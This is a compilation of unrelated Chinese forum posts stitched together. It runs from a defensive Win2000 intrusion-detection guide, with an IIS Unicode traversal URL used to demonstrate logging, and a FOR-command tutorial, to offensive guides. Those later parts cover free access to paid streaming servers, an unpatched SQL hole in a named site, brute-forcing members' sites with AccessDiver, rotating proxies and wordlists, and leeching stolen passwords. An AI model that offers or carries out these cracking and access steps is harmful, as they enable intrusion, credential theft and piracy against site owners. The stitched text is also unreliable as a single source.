经过精心配置的Win2000服务器可以防御90%以上的入侵和渗透,但是,就象上一章结束时我所提到的:系统安全是一个连续的过程,随着新漏洞的出现和服务器应用的变化,系统的安全状况也在不断变化着;同时由于攻防是矛盾的统一体,道消魔长和魔消道长也在不断的转换中,因此,再高明的系统管理员也不能保证一台正在提供服务的服务器长时间绝对不被入侵。 所以,安全配置服务器并不是安全工作的结束,相反却是漫长乏味的安全工作的开始,本文我们将初步探讨Win2000服务器入侵检测的初步技巧,希望能帮助您长期维护服务器的安全。 本文中所说的入侵检测指的是利用Win2000 Server自身的功能及系统管理员自己编写的软件/脚本进行的检测,使用防火墙(Firewall)或入侵监测系统(IDS)的技巧并不在本文的讨论范围之内。 现在假定:我们有一台Win2000 Server的服务器,并且经过了初步的安全配置(关于安全配置的详情可以参阅Win2000 Server安全配置入门<一>),在这种情况下,大部分的入侵者将被拒之门外。(哈哈,我管理员可以回家睡大觉去了)慢着,我说的是大部分,不是全部,经过初步安全配置的服务器虽然可以防御绝大多数的Script kid(脚本族-只会用别人写的程序入侵服务器的人),遇到了真正的高手,还是不堪一击的。虽然说真正的高手不会随便进入别人的服务器,但是也难保有几个品行不端的邪派高手看上了你的服务器。(我真的这么衰么?)而且,在漏洞的发现与补丁的发布之间往往有一段时间的真空,任何知道漏洞资料的人都可以乘虚而入,这时,入侵检测技术就显得非常的重要。 入侵的检测主要还是根据应用来进行,提供了相应的服务就应该有相应的检测分析系统来进行保护,对于一般的主机来说,主要应该注意以下几个方面: 1、 基于80端口入侵的检测 WWW服务大概是最常见的服务之一了,而且由于这个服务面对广大用户,服务的流量和复杂度都很高,所以针对这个服务的漏洞和入侵技巧也最多。对于NT来说,IIS一直是系统管理员比较头疼的一部分(恨不得关了80端口),不过好在IIS自带的日志功能从某种程度上可以成为入侵检测的得力帮手。IIS自带的日志文件默认存放在System32/LogFiles目录下,一般是按24小时滚动的,在IIS管理器中可以对它进行详细的配置。(具体怎么配我不管你,不过你要是不详细记录,回头查不到入侵者的IP可不要哭) 现在我们再假设(怎么老是假设呀,烦不烦?)别急呀,我不能为了写这篇文章真的去黑掉一台主机,所以只好假设了,我们假设一台WEB服务器,开放了WWW服务,你是这台服务器的系统管理员,已经小心地配置了IIS,使用W3C扩展的日志格式,并至少记录了时间(Time)、客户端IP(Client IP)、方法(Method)、URI资源(URI Stem)、URI查询(URI Query),协议状态(Protocol Status),我们用最近比较流行的Unicode漏洞来进行分析:打开IE的窗口,在地址栏输入:127.0.0.1/scripts/..%c1% 1c../winnt/system32/cmd.exe?/c+dir 默认的情况下你可以看到目录列表(什么?你已经做过安全配置了,看不到?恢复默认安装,我们要做个实验),让我们来看看IIS的日志都记录了些什么,打开Ex010318.log(Ex代表W3C扩展格式,后面的一串数字代表日志的记录日期):07:42:58 127.0.0.1 GET /scripts/..\../winnt/system32\cmd.exe /c+dir 200上面这行日志表示在格林威治时间07:42:58(就是北京时间23:42:58),有一个家伙(入侵者)从127.0.0.1的IP在你的机器上利用Unicode漏洞(%c1%1c被解码为"\",实际的情况会因为Windows语言版本的不同而有略微的差别)运行了cmd.exe,参数是/c dir,运行结果成功(HTTP 200代表正确返回)。(哇,记录得可真够全的,以后不敢随便乱玩Unicode了) 大多数情况下,IIS的日志会忠实地记录它接收到的任何请求(也有特殊的不被IIS记录的攻击,这个我们以后再讨论),所以,一个优秀的系统管理员应该擅长利用这点来发现入侵的企图,从而保护自己的系统。但是,IIS的日志动辄数十兆、流量大的网站甚至数十G,人工检查几乎没有可能,唯一的选择就是使用日志分析软件,用任何语言编写一个日志分析软件(其实就是文本过滤器)都非常简单,不过考虑到一些实际情况(比如管理员不会写程序,或者服务器上一时找不到日志分析软件),我可以告诉大家一个简单的方法,比方说你想知道有没有人从80端口上试图取得你的Global.asa文件,可以使用以下的CMD命令:find "Global.asa" ex010318.log /i这个命令使用的是NT自带的find.exe工具(所以不怕紧急情况找不着),可以轻松的从文本文件中找到你想过滤的字符串,"Global.asa"是需要查询的字符串,ex010318.log是待过滤的文本文件,/i代表忽略大小写。因为我无意把这篇文章写成微软的Help文档,所以关于这个命令的其他参数以及它的增强版FindStr.exe的用法请去查看Win2000的帮助文件。 无论是基于日志分析软件或者是Find命令,你都可以建立一张敏感字符串列表,包含已有的IIS漏洞(比如"+.htr")以及未来将要出现的漏洞可能会调用的资源(比如Global.asa或者cmd.exe),通过过滤这张不断更新的字符串表,一定可以尽早了解入侵者的行动。 需要提醒的是,使用任何日志分析软件都会占用一定的系统资源,因此,对于IIS日志分析这样低优先级的任务,放在夜里空闲时自动执行会比较合适,如果再写一段脚本把过滤后的可疑文本发送给系统管理员,那就更加完美了。同时,如果敏感字符串表较大,过滤策略复杂,我建议还是用C写一个专用程序会比较合算。 2、 基于安全日志的检测 通过基于IIS日志的入侵监测,我们能提前知道窥伺者的行踪(如果你处理失当,窥伺者随时会变成入侵者),但是IIS日志不是万能的,它在某种情况下甚至不能记录来自80端口的入侵,根据我对IIS日志系统的分析,IIS只有在一个请求完成后才会写入日志,换言之,如果一个请求中途失败,日志文件中是不会有它的踪影的(这里的中途失败并不是指发生HTTP400错误这样的情况,而是从TCP层上没有完成HTTP请求,例如在POST大量数据时异常中断),对于入侵者来说,就有可能绕过日志系统完成大量的活动。 而且,对于非80 Only的主机,入侵者也可以从其它的服务进入服务器,因此,建立一套完整的安全监测系统是非常必要的。 Win2000自带了相当强大的安全日志系统,从用户登录到特权的使用都有非常详细的记录,可惜的是,默认安装下安全审核是关闭的,以至于一些主机被黑后根本没法追踪入侵者。所以,我们要做的第一步是在管理工具-本地安全策略-本地策略-审核策略中打开必要的审核,一般来说,登录事件与账户管理是我们最关心的事件,同时打开成功和失败审核非常必要,其他的审核也要打开失败审核,这样可以使得入侵者步步维艰,一不小心就会露出马脚。仅仅打开安全审核并没有完全解决问题,如果没有很好的配置安全日志的大小及覆盖方式,一个老练的入侵者就能够通过洪水般的伪造入侵请求覆盖掉他真正的行踪。通常情况下,将安全日志的大小指定为50MB并且只允许覆盖7天前的日志可以避免上述情况的出现。 设置了安全日志却不去检查跟没有设置安全日志几乎一样糟糕(唯一的优点是被黑了以后可以追查入侵者),所以,制定一个安全日志的检查机制也是非常重要的,作为安全日志,推荐的检查时间是每天上午,这是因为,入侵者喜欢夜间行动(速度快呀,要不你入侵到一半的时候连不上了,那可是哭都哭不出来)上午上班第一件事正好看看日志有没有异常,然后就可以放心去做其他的事了。如果你喜欢,也可以编写脚本每天把安全日志作为邮件发送给你(别太相信这个了,要是哪个高手上去改了你的脚本,每天发送"平安无事"……) 除了安全日志,系统日志和应用程序日志也是非常好的辅助监测工具,一般来说,入侵者除了在安全日志中留下痕迹(如果他拿到了Admin权限,那么他一定会去清除痕迹的),在系统和应用程序日志中也会留下蛛丝马迹,作为系统管理员,要有不放过任何异常的态度,这样入侵者就很难隐藏他们的行踪。 3、文件访问日志与关键文件保护 除了系统默认的安全审核外,对于关键的文件,我们还要加设文件访问日志,记录对他们的访问。 文件访问有很多的选项:访问、修改、执行、新建、属性更改......一般来说,关注访问和修改就能起到很大的监视作用。 例如,如果我们监视了系统目录的修改、创建,甚至部分重要文件的访问(例如cmd.exe, net.exe,system32目录),那么,入侵者就很难安放后门而不引起我们的注意,要注意的是,监视的关键文件和项目不能太多,否则不仅增加系统负担,还会扰乱日常的日志监测工作(哪个系统管理员有耐心每天看四、五千条垃圾日志?) 关键文件不仅仅指的是系统文件,还包括有可能对系统管理员/其他用户构成危害的任何文件,例如系统管理员的配置、桌面文件等等,这些都是有可能用来窃取系统管理员资料/密码的。 4、 进程监控 进程监控技术是追踪木马后门的另一个有力武器,90%以上的木马和后门是以进程的形式存在的(也有以其他形式存在的木马,参见《揭开木马的神秘面纱三》),作为系统管理员,了解服务器上运行的每个进程是职责之一(否则不要说安全,连系统优化都没有办法做),做一份每台服务器运行进程的列表非常必要,能帮助管理员一眼就发现入侵进程,异常的用户进程或者异常的资源占用都有可能是非法进程。除了进程外,DLL也是危险的东西,例如把原本是exe类型的木马改写为dll后,使用rundll32运行就比较具有迷惑性。
5、 注册表校验 一般来说,木马或者后门都会利用注册表来再次运行自己,所以,校验注册表来发现入侵也是常用的手法之一。一般来说,如果一个入侵者只懂得使用流行的木马,那么由于普通木马只能写入特定的几个键值(比如Run、Runonce等等),查找起来是相对容易的,但是对于可以自己编写/改写木马的人来说,注册表的任何地方都可以藏身,靠手工查找就没有可能了。(注册表藏身千变万化,例如需要特别提出来的FakeGina技术,这种利用WINNT外嵌登录DLL(Ginadll)来获得用户密码的方法最近比较流行,一旦中招,登录用户的密码就会被记录无遗,具体的预防方法我这里就不介绍了。)应对的方法是监控注册表的任何改动,这样改写注册表的木马就没有办法遁形了。监控注册表的软件非常多,很多追查木马的软件都带有这样的功能,一个监控软件加上定期对注册表进行备份,万一注册表被非授权修改,系统管理员也能在最短的时间内恢复。 6、端口监控 虽然说不使用端口的木马已经出现,但是大部分的后门和木马还是使用TCP连接的,监控端口的状况对于由于种种原因不能封锁端口的主机来说就是非常重要的了,我们这里不谈使用NDIS网卡高级编程的IDS系统,对于系统管理员来说,了解自己服务器上开放的端口甚至比对进程的监控更加重要,常常使用netstat查看服务器的端口状况是一个良好的习惯,但是并不能24小时这样做,而且NT的安全日志有一个坏习惯,喜欢记录机器名而不是IP(不知道比尔盖子怎么想的),如果你既没有防火墙又没有入侵检测软件,倒是可以用脚本来进行IP日志记录的,看着这个命令: netstat -n -p tcp 10>>Netstat.log,这个命令每10秒钟自动查看一次TCP的连接状况,基于这个命令我们做一个Netlog.bat文件: time /t>>Netstat.log Netstat -n -p tcp 10>>Netstat.log 这个脚本将会自动记录时间和TCP连接状态,需要注意的是:如果网站访问量比较大,这样的操作是需要消耗一定的CPU时间的,而且日志文件将越来越大,所以请慎之又慎。(要是做个脚本就完美无缺,谁去买防火墙?:) 一旦发现异常的端口,可以使用特殊的程序来关联端口、可执行文件和进程(如inzider就有这样的功能,它可以发现服务器监听的端口并找出与该端口关联的文件,inzider可以从http://www.nttoolbox.com下载到),这样无论是使用TCP还是UDP的木马都无处藏身。 7、终端服务的日志监控 单独将终端服务(Terminal Service)的日志监控分列出来是有原因的,微软Win2000服务器版中自带的终端服务Terminal Service是一个基于远程桌面协议(RDP)的工具,它的速度非常快,也很稳定,可以成为一个很好的远程管理软件,但是因为这个软件功能强大而且只受到密码的保护,所以也非常的危险,一旦入侵者拥有了管理员密码,就能够象本机一样操作远程服务器(不需要高深的NT命令行技巧,不需要编写特殊的脚本和程序,只要会用鼠标就能进行一切系统管理操作,实在是太方便、也实在是太可怕了)。虽然很多人都在使用终端服务来进行远程管理,但是,并不是人人都知道如何对终端服务进行审核,大多数的终端服务器上并没有打开终端登录的日志,其实打开日志审核是很容易的,在管理工具中打开远程控制服务配置(Terminal Service Configration),点击"连接",右击你想配置的RDP服务(比如 RDP-TCP(Microsoft RDP 5.0),选中书签"权限",点击左下角的"高级",看见上面那个"审核"了么?我们来加入一个Everyone组,这代表所有的用户,然后审核他的"连接"、"断开"、"注销"的成功和"登录"的成功和失败就足够了,审核太多了反而不好,这个审核是记录在安全日志中的,可以从"管理工具"->"日志查看器"中查看。现在什么人什么时候登录我都一清二楚了,可是美中不足的是:这个破烂玩艺居然不记录客户端的IP(只能查看在线用户的IP),而是华而不实的记录什么机器名,倒!要是别人起个PIG的机器名你只好受他的嘲弄了,不知道微软是怎么想的,看来还是不能完全依赖微软呀,我们自己来吧?写个程序,一切搞定,你会C么?不会?VB呢?也不会?Delphi?……什么?你什么编程语言都不会?我倒,毕竟系统管理员不是程序员呀,别急别急,我给你想办法,我们来建立一个bat文件,叫做TSLog.bat,这个文件用来记录登录者的IP,内容如下: time /t >>TSLog.log netstat -n -p tcp | find ":3389">>TSLog.log start Explorer 我来解释一下这个文件的含义: 第一行是记录用户登录的时间,time /t的意思是直接返回系统时间(如果不加/t,系统会等待你输入新的时间),然后我们用追加符号">>"把这个时间记入TSLog.log作为日志的时间字段; 第二行是记录用户的IP地址,netstat是用来显示当前网络连接状况的命令,-n表示显示IP和端口而不是域名、协议,-ptcp是只显示tcp协议,然后我们用管道符号"|"把这个命令的结果输出给find命令,从输出结果中查找包含":3389"的行(这就是我们要的客户的IP所在的行,如果你更改了终端服务的端口,这个数值也要作相应的更改),最后我们同样把这个结果重定向到日志文件TSLog.log中去,于是在SLog.log文件中,记录格式如下: 22:40 TCP 192.168.12.28:3389 192.168.10.123:4903 ESTABLISHED 22:54 TCP 192.168.12.28:3389 192.168.12.29:1039 ESTABLISHED 也就是说只要这个TSLog.bat文件一运行,所有连在3389端口上的IP都会被记录,那么如何让这个批处理文件自动运行呢?我们知道,终端服务允许我们为用户自定义起始的程序,在终端服务配置中,我们覆盖用户的登录脚本设置并指定TSLog.bat为用户登录时需要打开的脚本,这样每个用户登录后都必须执行这个脚本,因为默认的脚本(相当于shell环境)是Explorer(资源管理器),所以我在TSLog.bat的最后一行加上了启动Explorer的命令startExplorer,如果不加这一行命令,用户是没有办法进入桌面的!当然,如果你只需要给用户特定的Shell: 例如cmd.exe或者word.exe你也可以把start Explorer替换成任意的shell。这个脚本也可以有其他的写法,作为系统管理员,你完全可以自由发挥你的想象力、自由利用自己的资源,例如写一个脚本把每个登录用户的IP发送到自己的信箱对于重要的服务器也是一个很好的方法。正常情况下一般的用户没有查看终端服务设置的权限,所以他不会知道你对登录进行了IP审核,只要把TSLog.bat文件和TSLog.log文件放在比较隐蔽的目录里就足够了,不过需要注意的是这只是一个简单的终端服务日志策略,并没有太多的安全保障措施和权限机制,如果服务器有更高的安全要求,那还是需要通过编程或购买入侵监测软件来完成的。 8、陷阱技术 早期的陷阱技术只是一个伪装的端口服务用来监测扫描,随着矛和盾的不断升级,现在的陷阱服务或者陷阱主机已经越来越完善,越来越象真正的服务,不仅能截获半开式扫描,还能伪装服务的回应并记录入侵者的行为,从而帮助判断入侵者的身份。 我本人对于陷阱技术并不是非常感兴趣,一来从技术人员角度来说,低调行事更符合安全的原则;二来陷阱主机反而成为入侵者跳板的情况并不仅仅出现在小说中,在现实生活中也屡见不鲜,如果架设了陷阱反而被用来入侵,那真是偷鸡不成了。 记得CoolFire说过一句话,可以用来作为对陷阱技术介绍的一个结束:在不了解情况时,不要随便进入别人的系统,因为你永远不能事先知道系统管理员是真的白痴或者伪装成白痴的天才...... 入侵监测的初步介绍就到这里,在实际运用中,系统管理员对基础知识掌握的情况直接关系到他的安全敏感度,只有身经百战而又知识丰富、仔细小心的系统管理员才能从一点点的蛛丝马迹中发现入侵者的影子,未雨绸缪,扼杀入侵的行动。
|
|
以前常觉得DOS的命令行功能太弱,无法象UNIX一样可以用命令行完成非常复杂的操作。实际上,当MS从WIN2K开始将命令行增强后,已经借鉴了相当多UNIX的优点,虽然还无法做到象UNIX那么灵活,但已可完成绝大多数的任务,比如用&&和||连接两个(或更多)命令,由前一个的返回值来决定下一个是否执行,等等。而在这些增强中,最明显的,就是FOR命令。
举个例子,用适当的参数,可用FOR命令将 date /t 的输出 从 "Sat 07/13/2002" 变成你想要的格式,比如, "2002-07-13":
c:\>for /f "tokens=2,3,4 delims=/ " %a in ('date /t') do @echo %c-%a-%b
2002-07-13
该例将在(3)中详细说明。
0. 基本应用
简单说,FOR是个循环,可以用你指定的循环范围生成一系列命令。最简单的例子,就是人工指定循环范围,然后对每个值执行指定的命令。例如,想快速报告每个硬盘分区的剩余空间:
for %a in (c: d: e: f do @dir %a\ | find "bytes free"
将输出:
8 Dir(s) 1,361,334,272 bytes free
15 Dir(s) 8,505,581,568 bytes free
12 Dir(s) 12,975,149,056 bytes free
7 Dir(s) 11,658,854,400 bytes free
用它可以使一些不支持通配符的命令对一系列文件进行操作。在WIN9X中,TYPE命令(显示文件内容)是不支持*.txt这种格式的(WIN2K开始TYPE已支持通配)。遇到类似情况就可以用FOR:
for %a in (*.txt) do type %a
这些还不是FOR最强大的功能。我认为它最强大的功能,表现在以下这些高级应用:
1. 可以用 /r 参数遍历整个目录树
2. 可以用 /f 参数将文本文件内容作为循环范围
3. 可以用 /f 参数将某一命令执行结果作为循环范围
4. 可以用 %~ 操作符将文件名分离成文件名、扩展名、盘符等独立部分
现分别举例说明如下:
1. 用 /r 遍历目录树
当用 *.* 或 *.txt 等文件名通配符作为 for /r 的循环范围时,可以对当前目录下所有文件(包括子目录里面的文件)进行操作。举个例子,你想在当前目录的所有txt文件(包括子目录)内容中查找"bluebear"字样,但由于find本身不能遍历子目录,所以我们用for:
for /r . %a in (*.txt) do @find "bluebear" %a
find 前面的 @ 只是让输出结果不包括 find 命令本身。这是DOS很早就有的功能。和FOR无关。
当用 . 作为循环范围时,for 只将子目录的结构(目录名)作为循环范围,而不包括里面的文件。有点象 TREE 命令,不过侧重点不同。TREE 的重点是用很漂亮易读的格式输出,而FOR的输出适合一些自动任务,例如,我们都知道用CVS管理的项目中,每个子目录下都会有一个CVS目录,有时在软件发行时我们想把这些CVS目录全部去掉:
for /r . %a in (.) do @if exist %a\CVS rd /s /q %a\CVS
先用 if exist 判断一下,是因为 for 只是机械的对每个目录进行列举,如果有些目录下面没有CVS也会被执行到。用 if exist 判断一下比较安全。
这种删除命令威力太大,请小心使用。最好是在真正执行以上的删除命令前,将 rd /s /q 换成 @echo 先列出要删出的目录,确认无误后再换回rd /s /q:
for /r . %a in (.) do @if exist %a\CVS @echo %a\CVS
可能目录中会多出一层 ".",比如 c:\proj\release\.\CVS ,但不会影响命令的执行效果。
2. 将某一文件内容或命令执行结果作为循环范围:
假如你有一个文件 todel.txt,里面是所有要删除的文件列表,现在你想将里面列出的每个文件都删掉。假设这个文件是每个文件名占一行,象这样:
c:\temp\a1.txt
c:\temp\a2.txt
c:\temp\subdir\b3.txt
c:\temp\subdir\b4.txt
那么可以用FOR来完成:
for /f %a in (todel.txt) do del %a
这个命令还可以更强大。比如你的 todel.txt 并不是象上面例子那么干净,而是由DIR直接生成,有一些没用的信息,比如这样:
Volume in drive D is DATA
Volume Serial Number is C47C-9908
Directory of D:\tmp
09/26/2001 12:50 PM 18,426 alg0925.txt
12/02/2001 04:29 AM 795 bsample.txt
04/11/2002 04:18 AM 2,043 invitation.txt
4 File(s) 25,651 bytes
0 Dir(s) 4,060,700,672 bytes free
for 仍然可以解出其中的文件名并进行操作:
for /f "skip=5 tokens=5" %a in (todel.txt) do @if exist %a DEL %a
当然,上面这个命令是在进行删除,如果你只是想看看哪些文件将被操作,把DEL换成echo:
for /f "skip=5 tokens=5" %a in (todel.txt) do @if exist %a echo %a
你将看到:
alg0925.txt
bsample.txt
invitation.txt
skip=5表示跳过前5行(就是DIR输出的头部信息),tokens=5表示将每行的第5列作为循环值放入%a,正好是文件名。在这里我加了一个文件存在判断,是因为最后一行的"free"刚好也是第5列,目前还想不出好的办法来滤掉最后两行,所以检查一下可保万无一失。
3. 可以用 /f 参数将某一命令执行结果作为循环范围
非常有用的功能。比如,我们想知道目前的环境变量有哪些名字(我们只要名字,不要值)。可是SET命令的输出是“名字=值”的格式,现在可以用FOR来只取得名字部分:
FOR /F "delims==" %i IN ('set') DO @echo %i
将看到:
ALLUSERSPROFILE
APPDATA
CLASSPATH
CommonProgramFiles
COMPUTERNAME
ComSpec
dircmd
HOMEDRIVE
......
这里是将set命令执行的结果拿来作为循环范围。delims==表示用=作为分隔符,由于FOR /F默认是用每行第一个TOKEN,所以可以分离出变量名。如果是想仅列出值:
FOR /F "delims== tokens=2" %i IN ('set') DO @echo %i
tokens=2和前例相同,表示将第二列(由=作为分隔符)作为循环值。
再来个更有用的例子:
我们知道 date /t (/t表示不要询问用户输入)的输出是象这样的:
Sat 07/13/2002
现在我想分离出日期部分,也就是13:
for /f "tokens=3 delims=/ " %a in ('date /t') do @echo %a
实际上把 tokens后面换成1,2,3或4,你将分别得到Sat, 07, 13和2002。注意delims=/后面还有个空格,表示/和空格都是分隔符。由于这个空格delims必须是/f选项的最后一项。
再灵活一点,象本文开头提到的,将日期用2002-07-13的格式输出:
for /f "tokens=2,3,4 delims=/ " %a in ('date /t') do @echo %c-%a-%b
当tokens后跟多个值时,将分别映射到%a, %b, %c等。实际上跟你指定的变量有关,如果你指定的是 %i, 它们就会用%i, %j, %k等。
灵活应用这一点,几乎没有做不了的事。
4. 可以用 %~ 操作符将文件名分离成文件名、扩展名、盘符等独立部分
这个比较简单,就是说将循环变量的值自动分离成只要文件名,只要扩展名,或只要盘符等等。
例:要将 c:\mp3下所有mp3的歌名列出,如果用一般的 dir /b/s 或 for /r ,将会是这样:
g:\mp3\Archived\05-18-01-A\游鸿明-下沙\游鸿明-01 下沙.mp3
g:\mp3\Archived\05-18-01-A\游鸿明-下沙\游鸿明-02 21个人.mp3
......
g:\mp3\Archived\05-18-01-A\王菲-寓言\王菲-阿修罗.mp3
g:\mp3\Archived\05-18-01-A\王菲-寓言\王菲-彼岸花.mp3
g:\mp3\Archived\05-18-01-A\王菲-寓言\王菲-不爱我的我不爱.mp3
......
如果我只要歌名(不要路径和".mp3"):
游鸿明-01 下沙
游鸿明-02 21个人
......
王菲-阿修罗
王菲-彼岸花
王菲-不爱我的我不爱
......
那么可以用FOR命令:
for /r g:\mp3 %a in (*.mp3) do @echo %~na
凡是 %~ 开头的操作符,都是文件名的分离操作。具体请看 for /? 帮助。
本文举的例子有些可能没有实际用处,或可用其它办法完成。仅用于体现FOR可以不借助其它工具,仅用DOS命令组合,就可完成相当灵活的任务。
彩虹頻道+香港有線+新東寶+台灣ashow(這下這幾個站完了)
1.彩虹頻道使用方法
a.首先進入http://rtv.aboutmedia.com.tw/et-rtv/vod.asp
選擇你要收看的片子,然後選擇“隨選視頻“,點擊鼠標右鍵,
選擇“複製快捷方式“,找到其中“filename=AJL1-01381_300k",
拷貝其中的“AJL1-01381_300k”的東東。
b.把你拷貝的“AJL1-01381_300k“加在以下三個mms服務其中的任何一個的後面,並且加上“asf"
如mms://210.58.100.110/rtvrot/AJL1-01381_300k.asf mms://210.58.100.111/rtvrot/AJL1-01381_300k.asf mms://210.58.100.112/rtvrot/AJL1-01381_300k.asf
不好意思剛才我在AJL1-01381_300k.asf多加了引號,現在糾正
c.好了,大功告成了,現在你就可以看影片了,如果某部看不起,可能是
文件丢失了,你可以換一部來看。(注意:請大家儘可能的輪流使用三台
mms服務器,這樣可减輕負載,不容易掛掉
2.新東寶使用方法:
和彩虹頻道的一樣,只是在地址中,你要改變rtvrot為
schannelrooot才行。
http://www.s-channel.com.tw/
3.iadultzone使用方法:
這是香港有線台的節目,速度很快。我把地址給出了 mms://61.10.2.59/iadultzone/jp/40min/300k/ic-40-0046-b.asf
你可以改變“ic-40-0046-b.asf"中的0046。
當然這些是40幾分鐘的日本片,你可以到
去注册一個,登陸後,選擇“日視温柔“進入,裡面的每部片子
都有像“ic-40-0046“這樣的影片序號,但是一些是10或20分鐘的
這樣,你只要改變“40min"為“10min”或者“20min“
並且改變“ic-40-0046"中的“40“为“10“或者“20“就好了
好要注意後面要加上“-b“。
盡量使用三個mms服務器,另外兩個是61.10.2.52和61.10.2.53
http://www.iadultzone.com/
4.http://www.ashow.tv的使用方法:/
這是用流媒体嗅探軟件(Project URL Snooper)
的方法,上次有人介紹了的,我在這裡就不說了 。
5.在線電視mms://203.133.6.195/gtv39nch mms://203.133.6.195/gtv52hota mms://203.133.6.195/gtv91schd
這裡要說明一下:上次有人公布的只是其中一台mms服務器,這是另外一台
ip地址是不一樣。
6。後記
a.注意:1.2.3都是非流媒体技術搞出來的,
其中mms://203.133.6.195/gtv39nch也是嗅探器探不出來的
你可以用嗅探軟件去試一下,看看能行ㄇ?
b.注意:新東寶還存在sql漏洞,有興趣的朋友可以去試一下。
並且新東寶中的在線電視可以用sql漏洞進去後,用嗅台器可以探出真實地址
(不要誤會,前三個不是用sql漏洞搞出來的真實地址)
注意:有人反映說,去下載了後變為.wmv的文件不能播放。的確,它是通過認證加密的,所以請大家不要再花時間去下載,白費時間,如果是可以看的,我也早就告訴大家了,所以,大家還是按我以上所說的方法去做!
收费网站破解
收费网站破解全攻略 1、谈到破解,当然需要一个工具,在这方面我们不得不承认国外的破解工具胜过国货,我以前用过流光等一些黑客工具。在破解网站的能力上十分有限。所以我在这里向,大家推荐一个破解工具AccessDivehttp://www.accessdiver.com/download/ad4.76.exe,下载安装后。当然现在需要的是我们破解的对象,也就是网站了。首先大家需要找到网站members的入口地址,举个例子我们在下面这个网页中看到了members only的标志 http:// 64611 ;那么我们就可以把鼠标放到members only上面然后点右键,点复制快捷方式,这样我们就得到了我们要破解的网址了。我们把这个http://www.xxx.com/members/index.html复制到破解工具AccessDiver最顶端SERVER后面的的那个长方框里面。ok!!第一步就完成了。
呵呵!!很多朋友听到这里可能觉得,这么简单啊!!你还用那么长时间才学会,真是笨,其实这只是刚刚开始,接下来跟着我一起继续破吧!
我们破解确实很爽。别人开网站的就到了霉,如果那一天发现我们的ip破他的网站,他肯定会拚了老命也要把我们逮出来。所以这里就要说到破解的安全性了。也就是proxy的使用,请大家在AccessDiver的界面点proxy然后在 USE WEb proxies前面的方格里打勾,看到Rotate proxies了吧?继续在它前面的方格你打勾,然后你会看到在Rotate proxies与logins to try before swapping 之间又出现一个方格,然后在里面填上 1 。这个选项是说我们每用完一个proxies后然自动换另一个,这是保证破解质量的一个重要因素。因为一些网站在安全系统方面已经改进了很多,如果你用一个ip(代理)破解它的网站,不到1分钟。便死悄悄了。。。。所以下面我们就需要一个所谓的proxylist.我在这里可以向大家提供一个list,大家把它保存在自己的硬盘后,然后用proxyhunter把它们检验一遍。把好的代理(proxies)保留在一个文档,然后在界面proxy--my list的最右边点击那个黄色文件夹的标志,我们就可以把刚才存档的proxy文档输进去了。然后对着最上面“黑色的勾“点右键就把所有的proxy选择了,最后在任意一个proxy上点一下,也就算把proxy的准备工作结束了。
最关键的时刻来到了,做完最后一部我们就可以开始破他了!也就是我们常说到的字典了,字典对于破解网站有着不言而喻的关键作用,字典如果选得不好,你就算从你的虫虫没长好开始破一直破到你老眼昏花都是无济于事的。那么今天我在这里会向大家贡献一个wordlist(字典),以后大家就要自己来leech wordlist.这里我不作详细介绍,具体的方法我会在大家对这个破解工具比较熟悉的情况下继续介绍。好的。点Dictionary在点 Curently used,然后点load a comb file把我给你的wordlist输进去吧!!
哈哈!!终于快写完了,大家也快见到曙光了。我们现在就可以开始了。记住上面的每一步你都要照做,否则开始不了不要找我!!如果你之前得每一部都搞定,那么我们就点
AccessDiver界面左上方黄色的Standard键,嘿嘿!!应该开始了吧!如果没有,就是你的proxy的问题。那么到proxy--my list 选项里选择一个其他的proxy在开始。
基本上最基本的方法我写完了,第一次肯定不会顺利。要知道我第一次破出密码是看了文章后的一个星期左右啊!你们比我幸运,至少看得是中文呀!时间肯定比我少,但是破不出来也不要伤心,自己慢慢的研究。
关于对proxy设置的重要补充:
就是首先大家要把my skill选成expert.
然后然后在 USE WEb proxies前面的方格里打勾
看到Rotate proxies了吧?继续在它前面的方格你打勾,然后你会看到在Rotate proxies
与logins to try before swapping 之间又出现一个方格,然后在里面填上 1
在proxy skipping
下面有四个框,在前3个框上打勾。
在proxy handing下第一个框前打勾
在试试吧!
回复就是动力!
密码研究三:密码破解有关问题
以下软件可http://www.icuming.com/members/下载,登陆的用户名和密码是tester。
我会继续更新这份帮助。
一,SiteCheck
这个软件用来检测你手中已有的password是否可用。首先将你看来的或者自己破解的password统统copy & paste进一个文本文件,每行的格式如下www.victim.com/members/www.victim.com/members/> target=_blawww.victim.com/members/www.victim.com/members/www.victim.com/members/>www.victim.com/members/>http://usernameawww.victim.com/members/ ;
然后打开sitecheck,选中这个文本文件,填上一个proxy,选择test hacked sites,它给开始检测,如果password失效,就清除掉,留下仍然可用的password,检测完可以保存。
注意,如果你有同一个站点的多个password,最好不要用这个软件检测,因为它不能自动更换代理,所以可能被站点block掉你的ip,这样所有的密码都会被认为失效。
二,Raptor
wordlist是cracker最宝贵的东西,如同少女的第一次。随着对crack的不断深入,就会发现实际上很多时间都是用来寻找,处理,完善自己的wordlist。如果你希望从网上众多的破解网站leech password,或者将自己wordlist里重复的login去除掉,或者做出一份指定格式的wordlist,我想你需要一个好的password软件,这就是raptor。
raptor的功能很多,界面也非常友好(我很少见到界面如此友好的黑客软件),所以我不打算一一介绍如何使用,只介绍最常用的几个功能:
1,打开一个wordlist,选"remove duplicates",去除掉所有重复的login。
2,"pass leech"里填加一个破解网站的地址,或者倒入一个list,大家可以把scheisse给出的破解网站地址保存为一个txt,然后在raptor里导入,然后选择start,开始leech password,对新手来说,这是得到wordlist最简单的办法。
3,在filter里,可以指点用户名和密码的长度,大小写等格式,从而得到一份你想要的wordlist。
其他还有合并wordlist文件,生成adultcheck,agecheck密码文件等强大功能,建议新手好好熟悉这个软件,只要你有兴趣crack,就离不开这个软件。
最好找个代理服务器
。。。。。。。。。。。。。。。。。。。。
破解在线电影多种技巧
妙用腾讯的浏览器找到在线电影地址!
腾讯的QQ大家都知道吧,那它的浏览器解决看不到原代码的问题却是再好不过了
有的网站会把电影作为一个窗口单独弹出,如果我们用IE打开的话它的IE地址和菜单栏就看不到了,我们就用腾讯的浏览器就可以将其破解!Let'''''''' Go!
利用IE单独弹出的电影对话框,我们发现它已经将所有的信息栏屏蔽了,而用腾讯浏览器就不同了,它的各种信息栏一个都不少(虽说这个地址一般都是假的)。既然是假的怎么办?不用急!破解:点击“查看”→“查看源文件”在弹出的文本框中找出电影地址就OK了!
-------------------------------------------------------------------------------
破解网页禁用鼠标右键绝招(3种)
